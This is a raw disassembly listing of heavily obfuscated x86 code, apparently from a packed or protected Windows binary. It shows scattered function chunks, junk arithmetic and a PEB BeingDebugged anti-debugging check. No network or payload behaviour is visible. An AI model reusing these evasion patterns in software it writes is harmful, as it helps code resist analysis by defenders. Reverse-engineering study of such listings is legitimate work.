; START OF FUNCTION CHUNK FOR sub_4550FF
loc_4399BD: ; CODE XREF: sub_4550FF:loc_458F02j
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_448223
call sub_45941F
push offset sub_455EA7
jmp nullsub_363
; END OF FUNCTION CHUNK FOR sub_4550FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44640F
loc_4399D8: ; CODE XREF: sub_44640F-254Dj
add ebp, eax
mov eax, 54C750A7h
jmp loc_44C488
; END OF FUNCTION CHUNK FOR sub_44640F
; ---------------------------------------------------------------------------
jmp ds:off_41D160
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_4399EA: ; CODE XREF: sub_445A04+Dj
; sub_444EAA:loc_447795j ...
js loc_43E9A0
pop edx
mov eax, [esp-4+arg_0]
push edx
call sub_449D3B
mov eax, 24DE0EA8h
call sub_43AA94
jmp loc_450AD1
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453FFB
loc_439A09: ; CODE XREF: sub_453FFB:loc_453E64j
call sub_45854D
push esi
push 42728448h
pop esi
add esi, 64FA4DFAh
jmp loc_4425E3
; END OF FUNCTION CHUNK FOR sub_453FFB
; ---------------------------------------------------------------------------
push ebx
push 0DF84AAAAh
pop ebx
and ebx, 9EA96397h
jmp loc_443B0A
; ---------------------------------------------------------------------------
loc_439A32: ; CODE XREF: ut7h7i2x:004516C1j
or ebp, 0A8BA051Fh
adc edx, 2CCDA1C2h
jmp loc_45274A
; =============== S U B R O U T I N E =======================================
sub_439A43 proc near ; CODE XREF: ut7h7i2x:0043B217j
; sub_447F0A:loc_448142p
; FUNCTION CHUNK AT 0045748D SIZE 0000001A BYTES
xchg edx, [esp+0]
pop edx
mov eax, 10h
push ebx
push 0E7D95631h
pop ebx
xor ebx, 5DA308B5h
jmp loc_45748D
sub_439A43 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_439A5E: ; CODE XREF: sub_449700:loc_443A83j
jnz loc_440D39
jmp loc_43CB35
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
mov edx, 277EFE57h
call sub_44ED9F
push ebx
mov ebx, eax
xchg ebx, [esp]
jmp loc_458336
; ---------------------------------------------------------------------------
locret_439A7E: ; CODE XREF: ut7h7i2x:loc_440928j
retn
; ---------------------------------------------------------------------------
loc_439A7F: ; CODE XREF: ut7h7i2x:0044E422j
jnp loc_44B52A
cdq
loc_439A86: ; CODE XREF: ut7h7i2x:0044308Aj
cmp ebx, 44B24096h
jmp loc_45057A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_439A91: ; CODE XREF: sub_4489DF:loc_45A8E2j
push 368F125Dh
pop eax
or eax, 0E3C46474h
and eax, 68F1DA89h
or eax, 964ABC6h
jmp loc_44330D
; END OF FUNCTION CHUNK FOR sub_4489DF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_459. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_439AAF: ; CODE XREF: sub_44BF76+5D81j
jmp loc_44ABFA
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_439AB4: ; CODE XREF: ut7h7i2x:00439016j
; sub_439BF8:loc_43BBBFj
sub esi, 0C7F9BF05h
xor esi, ds:4000F0h
add esi, 2A99C940h
xchg esi, [esp+0]
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A06
loc_439ACE: ; CODE XREF: sub_443A06-4047j
cdq
sbb edi, eax
jmp loc_44FA45
; END OF FUNCTION CHUNK FOR sub_443A06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_439AD6: ; CODE XREF: sub_43F1B2:loc_451AAAj
and edx, 0AF80CA08h
jmp sub_4448D7
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
push edi
jmp loc_445B32
; =============== S U B R O U T I N E =======================================
sub_439AE7 proc near ; CODE XREF: ut7h7i2x:0044410Ej
; sub_43F69F+12901p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439369 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A45D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043C91E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DDD9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EA7C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F746 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044071A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00446886 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448652 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448BEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF3B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B24B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450461 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045220B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00452C4E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453FF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457BAE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004588B2 SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
xchg esi, [esp-4+arg_0]
mov eax, [ebp-30h]
push ebp
mov ebp, edi
xchg ebp, [esp+0]
jmp loc_43C91E
sub_439AE7 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_439AFD proc near ; DATA XREF: sub_4408C2:loc_44D89Do
push 0C5FFA21Eh
pop eax
rol eax, 0Dh
or eax, 0F9928AD9h
and eax, 62B3F2DDh
call sub_458345
sub_439AFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439B17 proc near ; CODE XREF: sub_44CBC2-13A5Cp
; sub_459653-20428p ...
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push offset loc_4530CE
jmp nullsub_26
sub_439B17 endp
; =============== S U B R O U T I N E =======================================
sub_439B27 proc near ; DATA XREF: sub_43B4E3+17E16o
; FUNCTION CHUNK AT 0043F1BB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449EFE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D314 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DAE2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450CEE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457A5A SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045A6CB SIZE 00000005 BYTES
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43FAB4
jmp loc_450CEE
sub_439B27 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_439B38 proc near ; CODE XREF: ut7h7i2x:0044512Aj
; sub_459D9F-BBC5p
xchg edx, [esp+0]
pop edx
mov byte ptr [eax], 0C3h
jmp loc_440F13
sub_439B38 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edx
push 0E37AEF16h
pop edx
jmp loc_43AE3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AF2
loc_439B50: ; CODE XREF: sub_440AF2:loc_4515F2j
xchg ecx, [esp+4+var_4]
jmp loc_43CA43
; END OF FUNCTION CHUNK FOR sub_440AF2
; =============== S U B R O U T I N E =======================================
sub_439B58 proc near ; CODE XREF: ut7h7i2x:0044A231p
; ut7h7i2x:0045A7E5j
; FUNCTION CHUNK AT 0043B136 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043BE01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CEE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B7B3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F65B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A4F1 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push eax
push 4B7BF29Ah
jmp loc_43B136
sub_439B58 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_439B67 proc near ; CODE XREF: ut7h7i2x:0043D33Aj
; sub_44B5CF+Dp
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043A4AB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043FBE9 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004400F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004415B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444358 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00444FF8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448176 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004484C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449924 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C37 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450EA7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004553EB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00456314 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A3E4 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ecx
mov [ebp-4], eax
mov eax, [ebp-4]
mov al, [eax]
jz loc_43A4AB
sub al, 99h
jmp loc_450C37
sub_439B67 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_439B81: ; CODE XREF: sub_4524FE+Cj
jz loc_452EAE
jmp loc_44FF1B
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_439B8C: ; CODE XREF: sub_43A0C7:loc_44B5A6j
push 0CA1B74DEh
sub edx, esi
jmp loc_453BD3
; END OF FUNCTION CHUNK FOR sub_43A0C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_439B98: ; CODE XREF: sub_4442CC:loc_458D2Bj
sub edi, 0C68BC634h
adc esi, eax
jmp loc_455A82
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
loc_439BA5: ; CODE XREF: ut7h7i2x:0044619Aj
ja loc_45A056
loc_439BAB: ; CODE XREF: ut7h7i2x:loc_4456A2j
add ecx, 512FE929h
xchg ecx, [esp]
jmp sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_439BB9 proc near ; DATA XREF: sub_43C413+1A223o
var_4 = dword ptr -4
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
call sub_454196
retn
sub_439BB9 endp
; ---------------------------------------------------------------------------
loc_439BC5: ; CODE XREF: ut7h7i2x:0044B39Ej
jmp loc_451CC4
; ---------------------------------------------------------------------------
loc_439BCA: ; CODE XREF: ut7h7i2x:loc_445F9Dj
push esi
mov esi, eax
xchg esi, [esp]
retn
; =============== S U B R O U T I N E =======================================
sub_439BD1 proc near ; CODE XREF: sub_446320-BEE4j
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043BACE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043BD23 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E633 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E82E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FABA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FE41 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00440372 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441347 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441654 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445EB8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00446634 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448BB3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004499BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B01A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B4E3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DD6E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E7BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC7F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044ED29 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044EE38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F1C5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FFB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004504DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004508FC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004510B0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004522A9 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00452A7A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452DFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004533F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453A5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454151 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456694 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045707A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004582BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F6C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459FA2 SIZE 0000000D BYTES
push ebp
jmp loc_43E82E
sub_439BD1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_439BD7: ; CODE XREF: sub_44EC11+BDBDj
or esi, ebx
and edi, 88EED6D6h
loc_439BDF: ; CODE XREF: sub_44EC11:loc_44A4CAj
xor eax, eax
push edx
push 84B40463h
pop edx
jmp loc_456872
; END OF FUNCTION CHUNK FOR sub_44EC11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_260. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_439BEE: ; CODE XREF: sub_454B2B+5575j
jmp loc_439809
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D77D
loc_439BF3: ; CODE XREF: sub_44D77D+Aj
jmp loc_44A55A
; END OF FUNCTION CHUNK FOR sub_44D77D
; =============== S U B R O U T I N E =======================================
sub_439BF8 proc near ; CODE XREF: sub_447EB5-B36Fp
; ut7h7i2x:0044BDB3j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439408 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00439AB4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043A1C5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043A829 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043AC76 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043B068 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B301 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B50E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B621 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BBBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BC29 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C2D3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043C44D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CCDB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CD03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D211 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D7A6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DA76 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DB9E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043E851 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FD12 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043FF09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440112 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00440F18 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441FD1 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004421EA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044260B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426F2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044293D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442EF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044344F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443FF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444777 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004448BD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445281 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004456E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445C8F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004461BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446A0A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004472B3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004479CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E96 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448208 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004484F2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449F18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A576 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044AAD9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AC00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C286 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044C74A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C8A1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044C912 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CB0C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CE55 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D522 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC60 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F297 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F89B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044FBA2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FE29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FE5D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004500E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501EC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004512C7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045172F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451DDA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004520C2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004520D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452281 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045237D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452426 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F11 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455167 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 004554C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455662 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560FB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456862 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456C44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457282 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004577DB SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00457DFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458206 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458BFA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004597D6 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00459EDF SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459F0E SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
push 8BEA382h
pop esi
add esi, 0CAE495FEh
test esi, 200h
loc_439C0E: ; CODE XREF: ut7h7i2x:loc_45065Cj
jmp loc_43BBBF
sub_439BF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_439C13: ; CODE XREF: sub_455807-1320Ej
jb near ptr aZ4LQshooiS_d+7
not eax
jmp loc_43B0B3
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_439C20: ; CODE XREF: sub_4448AF+9j
push ecx
mov [ebp-4], eax
call sub_449700
call sub_43C1D2
test al, al
jmp loc_44DFE1
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_439C35: ; CODE XREF: sub_44E5AB:loc_43A169j
; ut7h7i2x:0043A182j
sub eax, 6FD0C2D4h
xor eax, 0C44BB67Dh
push ecx
pushf
push 3B647434h
pop ecx
xor ecx, ds:4000F6h
rol ecx, 1Eh
jmp loc_43D4E8
; END OF FUNCTION CHUNK FOR sub_44E5AB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_393. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_439C58: ; CODE XREF: sub_455807-1A748j
jmp loc_44D5D1
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_439C5D: ; CODE XREF: sub_44081E+10E98j
rol edx, 5
mov ebx, 0A974576Dh
jp loc_44A494
jmp loc_448896
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
loc_439C70: ; CODE XREF: ut7h7i2x:0044F03Bj
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F256
loc_439C72: ; CODE XREF: sub_44F256+19j
jmp loc_43A52C
; END OF FUNCTION CHUNK FOR sub_44F256
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_426. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_439C78: ; CODE XREF: sub_4524FE-134D3j
jmp nullsub_507
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
loc_439C7D: ; DATA XREF: sub_43FD68+4o
push edx
jmp loc_44165E
; ---------------------------------------------------------------------------
loc_439C83: ; CODE XREF: ut7h7i2x:0043A823j
and ecx, edx
; =============== S U B R O U T I N E =======================================
sub_439C85 proc near ; CODE XREF: sub_457FD0+3p
; FUNCTION CHUNK AT 00447977 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00448536 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF26 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
jz loc_44CF26
jmp loc_448536
sub_439C85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_439C9B: ; CODE XREF: sub_4544E6:loc_45A594j
mov eax, [ebp-4]
inc eax
mov eax, [eax]
add eax, [ebp-4]
jmp loc_43F641
; ---------------------------------------------------------------------------
loc_439CA9: ; CODE XREF: sub_4544E6:loc_44D3F1j
mov eax, [ebp-4]
call sub_450651
jmp loc_4424F3
; END OF FUNCTION CHUNK FOR sub_4544E6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_274. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459D0E
loc_439CB7: ; CODE XREF: sub_459D0E+9j
jmp loc_45AB20
; END OF FUNCTION CHUNK FOR sub_459D0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AE70
loc_439CBC: ; CODE XREF: sub_44AE70+Cj
jmp nullsub_172
; END OF FUNCTION CHUNK FOR sub_44AE70
; ---------------------------------------------------------------------------
loc_439CC1: ; CODE XREF: ut7h7i2x:0044AC21j
jmp loc_45131D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_439CC6: ; CODE XREF: sub_446599-E7j
call sub_457F14
; END OF FUNCTION CHUNK FOR sub_446599
; START OF FUNCTION CHUNK FOR sub_451EDF
loc_439CCB: ; CODE XREF: sub_451EDF+Ej
jmp sub_44A4C0
; END OF FUNCTION CHUNK FOR sub_451EDF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_439CD0: ; CODE XREF: sub_4471CA:loc_453D6Ej
jnz loc_44643B
jmp loc_44324F
; END OF FUNCTION CHUNK FOR sub_4471CA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_439CDC: ; CODE XREF: sub_45854D-19833j
and ebp, eax
and esi, 0AC89E48Dh
xor edx, edi
jmp loc_44FD25
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
loc_439CEB: ; CODE XREF: ut7h7i2x:00444B50j
push eax
add ebx, 514FE525h
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_439CF2: ; CODE XREF: sub_4459EE:loc_444B43j
rol eax, 0Bh
test eax, 2000000h
jmp loc_457402
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_439D00: ; CODE XREF: sub_457A66:loc_440CB7j
jz loc_453CF5
jmp loc_43B8F8
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_439D0B: ; CODE XREF: sub_455145:loc_43C893j
jz loc_4475D7
jmp loc_43AABF
; END OF FUNCTION CHUNK FOR sub_455145
; =============== S U B R O U T I N E =======================================
sub_439D16 proc near ; DATA XREF: ut7h7i2x:loc_44E10Do
; FUNCTION CHUNK AT 004471D5 SIZE 0000001A BYTES
push 8F5B1C11h
pop edx
sub edx, ds:4000FBh
and edx, 9C0FE594h
jmp loc_4471D5
sub_439D16 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_439D2D: ; CODE XREF: sub_448321:loc_43E38Dj
jnz loc_448AC7
loc_439D33: ; CODE XREF: ut7h7i2x:00450A38j
jmp nullsub_471
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
xchg ebp, [ecx]
cmp ecx, 0F1D65B01h
jmp loc_453B25
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B234
loc_439D45: ; CODE XREF: sub_43B234+Fj
push 0CFCDC4E8h
pop edi
rol edi, 1Ch
add edi, 73477907h
xchg edi, [esp+0]
jmp loc_43F422
; END OF FUNCTION CHUNK FOR sub_43B234
; =============== S U B R O U T I N E =======================================
sub_439D5C proc near ; CODE XREF: sub_43CEF8+Ep
; ut7h7i2x:00448FFBj
; FUNCTION CHUNK AT 00439579 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043B955 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D697 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043FC6F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442F2F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004436EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CC3E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044EE14 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F07D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F0B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F33C SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00450DBC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455473 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457C8E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458789 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, large fs:30h
add eax, 2
mov eax, [eax]
or al, al
jmp loc_450DBC
sub_439D5C endp ; sp-analysis failed
